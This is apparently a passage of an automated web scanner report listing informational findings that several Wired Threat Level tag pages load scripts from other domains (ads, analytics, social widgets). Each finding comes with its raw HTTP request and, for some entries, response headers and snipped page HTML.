<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.183. http://www.wired.com/threatlevel/tag/ccc/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/ccc/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/ccc/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

16.184. http://www.wired.com/threatlevel/tag/censorship/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/censorship/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/censorship/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:02 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=1
Expires: Wed, 12 Jan 2011 15:33:25 GMT
Date: Wed, 12 Jan 2011 15:33:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 127014

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.185. http://www.wired.com/threatlevel/tag/china/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/china/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/china/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

16.186. http://www.wired.com/threatlevel/tag/copyright/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/copyright/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/copyright/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

16.187. http://www.wired.com/threatlevel/tag/crime/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/crime/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/crime/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:06 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=57
Expires: Wed, 12 Jan 2011 15:34:33 GMT
Date: Wed, 12 Jan 2011 15:33:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 127003

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.188. http://www.wired.com/threatlevel/tag/defcon/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/defcon/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/defcon/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:07 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=29
Expires: Wed, 12 Jan 2011 15:34:10 GMT
Date: Wed, 12 Jan 2011 15:33:41 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 135616

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.189. http://www.wired.com/threatlevel/tag/dmca/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/dmca/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/dmca/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

16.190. http://www.wired.com/threatlevel/tag/facebook/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/facebook/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/facebook/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 12:35:59 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=61
Expires: Wed, 12 Jan 2011 15:35:05 GMT
Date: Wed, 12 Jan 2011 15:34:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 126359

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.191. http://www.wired.com/threatlevel/tag/fbi/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/fbi/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/fbi/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

16.192. http://www.wired.com/threatlevel/tag/file-sharing/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/file-sharing/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/file-sharing/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 12:54:43 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=475
Expires: Wed, 12 Jan 2011 15:42:07 GMT
Date: Wed, 12 Jan 2011 15:34:12 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 122902

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.193. http://www.wired.com/threatlevel/tag/first-amendment/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/first-amendment/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/first-amendment/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

16.194. http://www.wired.com/threatlevel/tag/google/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/google/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/google/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 12:33:32 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:42:15 GMT
Date: Wed, 12 Jan 2011 15:34:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 113727

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.195. http://www.wired.com/threatlevel/tag/hack/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/hack/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/hack/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

16.196. http://www.wired.com/threatlevel/tag/hacking/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/hacking/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/hacking/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/threatlevel/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 15:26:14 +0000
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=480
Expires: Wed, 12 Jan 2011 15:42:19 GMT
Date: Wed, 12 Jan 2011 15:34:19 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 117574

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.197. http://www.wired.com/threatlevel/tag/intellectual-property/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/intellectual-property/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/intellectual-property/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 12:21:42 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:42:26 GMT
Date: Wed, 12 Jan 2011 15:34:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 133222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.198. http://www.wired.com/threatlevel/tag/mpaa/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/threatlevel/tag/mpaa/

Issue detail

The response dynamically includes the following scripts from other domains:

http://digg.com/tools/diggthis.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /threatlevel/tag/mpaa/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 13:20:07 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=433
Expires: Wed, 12 Jan 2011 15:41:44 GMT
Date: Wed, 12 Jan 2011 15:34:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 118489

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
<br />
<script src="http://digg.com/tools/diggthis.js" type="text/javascript"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="textwidget"><script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

